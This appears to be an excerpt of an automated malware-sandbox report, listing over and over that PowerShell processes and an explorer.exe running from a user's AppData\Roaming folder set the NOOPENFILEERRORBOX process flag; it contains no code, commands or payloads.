Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
